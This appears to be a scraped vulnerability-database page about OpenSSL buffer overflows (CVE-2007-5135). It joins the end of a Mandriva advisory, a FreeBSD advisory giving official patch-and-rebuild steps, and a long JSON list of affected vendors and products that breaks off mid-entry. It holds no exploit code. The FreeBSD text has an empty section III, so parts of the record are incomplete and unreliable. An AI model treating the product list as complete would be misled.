    Corporate 4.0/X86_64: b5ae71aacd5b99be9e9327d58da29230 corporate/4.0/x86_64/lib64openssl0.9.7-0.9.7g-2.5.20060mlcs4.x86_64.rpm 89296e03778a198940c1c413e44b9f45 corporate/4.0/x86_64/lib64openssl0.9.7-devel-0.9.7g-2.5.20060mlcs4.x86_64.rpm cb17a0d801c1181ab380472b8ffb085e corporate/4.0/x86_64/lib64openssl0.9.7-static-devel-0.9.7g-2.5.20060mlcs4.x86_64.rpm 76b3078e53be2ddc019bee74ccb1f39e corporate/4.0/x86_64/libopenssl0.9.7-0.9.7g-2.5.20060mlcs4.i586.rpm 0aa4ca3b0d2925255650fb90132d7aad corporate/4.0/x86_64/libopenssl0.9.7-devel-0.9.7g-2.5.20060mlcs4.i586.rpm 86dc91f1701293f3319a833746bbe421 corporate/4.0/x86_64/libopenssl0.9.7-static-devel-0.9.7g-2.5.20060mlcs4.i586.rpm 8d9a55afdc6d930916bac00fd4c4739b corporate/4.0/x86_64/openssl-0.9.7g-2.5.20060mlcs4.x86_64.rpm a8d2a946d266a94c6d46537ad78b18fa corporate/4.0/SRPMS/openssl-0.9.7g-2.5.20060mlcs4.src.rpm

    Multi Network Firewall 2.0: cd7ad7e95ce17995dfa8129ebe517049 mnf/2.0/i586/libopenssl0.9.7-0.9.7c-3.7.M20mdk.i586.rpm 11771240baebdc6687af70a8a0f2ffd2 mnf/2.0/i586/libopenssl0.9.7-devel-0.9.7c-3.7.M20mdk.i586.rpm 8f672bc81b9528598a8560d876612bfa mnf/2.0/i586/libopenssl0.9.7-static-devel-0.9.7c-3.7.M20mdk.i586.rpm 214f857a36e5c3e600671b7291cd08ae mnf/2.0/i586/openssl-0.9.7c-3.7.M20mdk.i586.rpm bbb299fd643ccbfbdc1a48b12c7005ce mnf/2.0/SRPMS/openssl-0.9.7c-3.7.M20mdk.src.rpm


    To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

    All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

    gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

    You can view other update advisories for Mandriva Linux at:

    http://www.mandriva.com/security/advisories

    If you want to report vulnerabilities, please contact

    security_(at)_mandriva.com


    Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2.2 (GNU/Linux)

    iD8DBQFFIU7bmqjQ0CJFipgRAuYAAKCZlwMqJzrVCpKYdEqs+UiyM6WrSQCfeIv3 mAaLoEPfjUca1TR98vgpZUU= =Ff9O -----END PGP SIGNATURE-----


    Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

    ============================================================================= FreeBSD-SA-07:08.openssl Security Advisory The FreeBSD Project

    Topic: Buffer overflow in OpenSSL SSL_get_shared_ciphers()

    Category: contrib Module: openssl Announced: 2007-10-03 Credits: Moritz Jodeit Affects: All FreeBSD releases. Corrected: 2007-10-03 21:39:43 UTC (RELENG_6, 6.2-STABLE) 2007-10-03 21:40:35 UTC (RELENG_6_2, 6.2-RELEASE-p8) 2007-10-03 21:41:22 UTC (RELENG_6_1, 6.1-RELEASE-p20) 2007-10-03 21:42:00 UTC (RELENG_5, 5.5-STABLE) 2007-10-03 21:42:32 UTC (RELENG_5_5, 5.5-RELEASE-p16) CVE Name: CVE-2007-5135

    For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit .

    I. Background

    FreeBSD includes software from the OpenSSL Project. The OpenSSL Project is a collaborative effort to develop a robust, commercial-grade, full-featured, and Open Source toolkit implementing the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols as well as a full-strength general purpose cryptography library.

    II. Problem Description

    A buffer overflow addressed in FreeBSD-SA-06:23.openssl has been found to be incorrectly fixed.

    III.

    IV. Workaround

    No workaround is available, but only applications using the SSL_get_shared_ciphers() function are affected.

    V. Solution

    Perform one of the following:

    1) Upgrade your vulnerable system to 5-STABLE, or 6-STABLE, or to the RELENG_6_2, RELENG_6_1, or RELENG_5_5 security branch dated after the correction date.

    2) To patch your present system:

    The following patch have been verified to apply to FreeBSD 5.5, 6.1, and 6.2 systems.

    a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility.

    fetch http://security.FreeBSD.org/patches/SA-07:08/openssl.patch

    fetch http://security.FreeBSD.org/patches/SA-07:08/openssl.patch.asc

    b) Execute the following commands as root:

    cd /usr/src

    patch < /path/to/patch

    cd /usr/src/secure/lib/libssl

    make obj && make depend && make && make install

    VI. Correction details

    The following list contains the revision numbers of each file that was corrected in FreeBSD.

    Branch Revision Path


    RELENG_5 src/crypto/openssl/ssl/ssl_lib.c 1.1.1.11.2.3 RELENG_5_5 src/UPDATING 1.342.2.35.2.16 src/sys/conf/newvers.sh 1.62.2.21.2.18 src/crypto/openssl/ssl/ssl_lib.c 1.1.1.11.2.1.4.2 RELENG_6 src/crypto/openssl/ssl/ssl_lib.c 1.1.1.12.2.2 RELENG_6_2 src/UPDATING 1.416.2.29.2.11 src/sys/conf/newvers.sh 1.69.2.13.2.11 src/crypto/openssl/ssl/ssl_lib.c 1.1.1.12.2.1.2.1 RELENG_6_1 src/UPDATING 1.416.2.22.2.22 src/sys/conf/newvers.sh 1.69.2.11.2.22 src/crypto/openssl/ssl/ssl_lib.c 1.1.1.12.6.2


    VII. References

    http://marc.info/?l=bugtraq&m=119091888624735 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3738 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5135

    The latest revision of this advisory is available at http://security.FreeBSD.org/advisories/FreeBSD-SA-07:08.openssl.asc -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.7 (FreeBSD)

    iD8DBQFHBA+HFdaIBMps37IRAtTQAJ0bFBZt7DVJzhQkUcu7VdNS7Kj8cwCeMQaS cNFjW3j2eolZhlee83l3blo= =zwC2 -----END PGP SIGNATURE-----

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-200609-1274",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "debian gnu linux",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "f5",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "freebsd",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "openpkg",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "openssl",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "oracle",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "red hat",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "suse linux",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "slackware linux",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "ubuntu",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "rpath",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "trustix secure linux",
            "version": null
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7b"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7h"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7k"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.8"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7f"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7g"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7e"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7c"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7i"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.8b"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.8c"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.8a"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7j"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7a"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7d"
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "appgate network security",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "apple computer",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "attachmatewrq",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "avaya",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "blue coat",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "gentoo linux",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "gnutls",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "hewlett packard",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "iaik java group",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "ibm",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "internet consortium",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "intoto",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "juniper",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "mandriva",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "mozilla",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "openwall gnu linux",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "opera",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "rsa security",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "ssh security corp",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "sun microsystems",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "sybase",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "vmware",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "vandyke",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "stonesoft",
            "version": null
          },
          {
            "model": "css11500 content services switch s",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "cisco",
            "version": "7.30"
          },
          {
            "model": "css11500 content services switch s",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "cisco",
            "version": "7.20"
          },
          {
            "model": "wide area file services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "model": "linux desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "1.0"
          },
          {
            "model": "hardware management console for pseries",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.3.7"
          },
          {
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3"
          },
          {
            "model": "call manager sr2c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0"
          },
          {
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.4"
          },
          {
            "model": "siparator",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.5.2"
          },
          {
            "model": "-releng",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "4.11"
          },
          {
            "model": "security agent",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.1.79"
          },
          {
            "model": "networks vpn router contivity",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "-26000"
          },
          {
            "model": "enterprise linux es ia64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0.5"
          },
          {
            "model": "server b",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.16"
          },
          {
            "model": "project openssl g",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "secure acs solution engine",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "computing snapgear sg565",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "secure",
            "version": "0"
          },
          {
            "model": "openbsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openbsd",
            "version": "3.9"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.2"
          },
          {
            "model": "ciscoworks common services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.2"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.6(0)"
          },
          {
            "model": "project openssl b",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.8"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0(1)"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.8.3"
          },
          {
            "model": "secure acs for unix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.0"
          },
          {
            "model": "cwrsync",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cwrsync",
            "version": "2.0.10"
          },
          {
            "model": "servercluster",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.5"
          },
          {
            "model": "appliance server hosting edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "1.0"
          },
          {
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.2"
          },
          {
            "model": "s8500 r2.0.1",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "model": "hardware management console for pseries",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.3.2"
          },
          {
            "model": "fuji",
            "scope": null,
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": null
          },
          {
            "model": "hardware management console for pseries r1.0",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.0"
          },
          {
            "model": "project openssl b",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "cwrsync",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cwrsync",
            "version": "2.0.9"
          },
          {
            "model": "hardware management console for iseries r4.0",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "call manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.1"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154543.1.0"
          },
          {
            "model": "workcentre",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "76650"
          },
          {
            "model": "css11500 content services switch",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7.4"
          },
          {
            "model": "messaging storage server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "2.0"
          },
          {
            "model": "project openssl b-36.8",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "networks meridian option 61c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1-0"
          },
          {
            "model": "http server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.2.0"
          },
          {
            "model": "systems management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.7.168"
          },
          {
            "model": "linux lts amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.06"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.8"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.1(1)"
          },
          {
            "model": "hat red hat network satellite server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "red",
            "version": "5.0"
          },
          {
            "model": "ftp server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "serv u",
            "version": "6.00"
          },
          {
            "model": "works common services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.0"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.6(1)"
          },
          {
            "model": "workcentre pro",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "232"
          },
          {
            "model": "s8700 cm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1"
          },
          {
            "model": "s8300 cm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1"
          },
          {
            "model": "-release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "5.4"
          },
          {
            "model": "linux professional oss",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "10.0"
          },
          {
            "model": "mds",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "90001.3"
          },
          {
            "model": "linux enterprise server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "8"
          },
          {
            "model": "system management homepage",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.9"
          },
          {
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.2.3"
          },
          {
            "model": "linux professional x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9.3"
          },
          {
            "model": "secure linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "trustix",
            "version": "3.0"
          },
          {
            "model": "suse linux retail solution",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "8.0"
          },
          {
            "model": "-release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "6.1"
          },
          {
            "model": "linux enterprise desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "10"
          },
          {
            "model": "ons",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154548.0"
          },
          {
            "model": "solaris data encryption kit",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "x8610.0"
          },
          {
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "9.1"
          },
          {
            "model": "enterprise linux as",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "3"
          },
          {
            "model": "appliance server workgroup edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "1.0"
          },
          {
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.2.1"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1(2)"
          },
          {
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "3.0"
          },
          {
            "model": "ipcop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ipcop",
            "version": "1.4.11"
          },
          {
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "1.4.2"
          },
          {
            "model": "hardware management console for iseries r5.0",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "wide area application services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "model": "s8710 cm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1"
          },
          {
            "model": "server c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.8"
          },
          {
            "model": "hardware management console",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.3.7"
          },
          {
            "model": "linux mandrake",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "2007.0"
          },
          {
            "model": "secure acs solution engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.3.1"
          },
          {
            "model": "grid engine update5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "6.0"
          },
          {
            "model": "linux database server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "0"
          },
          {
            "model": "suse linux standard server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "8.0"
          },
          {
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0"
          },
          {
            "model": "hardware management console for pseries r5.0",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "linux professional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "10.1"
          },
          {
            "model": "hardware management console for iseries",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.3.7"
          },
          {
            "model": "linux mandrake x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "2006.0"
          },
          {
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.5.1"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1(3)"
          },
          {
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.1"
          },
          {
            "model": "grid engine update7",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "6.0"
          },
          {
            "model": "hardware management console",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.2.1"
          },
          {
            "model": "linux professional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9.3"
          },
          {
            "model": "stonebeat fullcluster for raptor",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154543.2.0"
          },
          {
            "model": "-stable",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "6.1"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1(0)"
          },
          {
            "model": "openpkg",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openpkg",
            "version": "2.5"
          },
          {
            "model": "server 0.9.1b",
            "scope": null,
            "trust": 0.3,
            "vendor": "filezilla",
            "version": null
          },
          {
            "model": "download accelarator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "prozilla",
            "version": "1.4.0"
          },
          {
            "model": "ciscoworks common management foundation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.0"
          },
          {
            "model": "call manager es32",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1"
          },
          {
            "model": "call manager 4.1 sr4",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.6"
          },
          {
            "model": "openvms secure web server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1-1"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.14"
          },
          {
            "model": "project openssl g",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "open-enterprise-server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "0"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1(1)"
          },
          {
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0.2"
          },
          {
            "model": "project openssl h",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.8.8"
          },
          {
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "3.2.1"
          },
          {
            "model": "stonegate ips sensor and analyzer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.9"
          },
          {
            "model": "server a",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.8"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.6"
          },
          {
            "model": "openvms secure web server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "1.2"
          },
          {
            "model": "propack sp6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sgi",
            "version": "3.0"
          },
          {
            "model": "computing snapgear sg560",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "secure",
            "version": "0"
          },
          {
            "model": "suse linux school server for i386",
            "scope": null,
            "trust": 0.3,
            "vendor": "s u s e",
            "version": null
          },
          {
            "model": "project openssl i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "grid engine sun linux",
            "scope": "eq",
            "trust": 0.3,
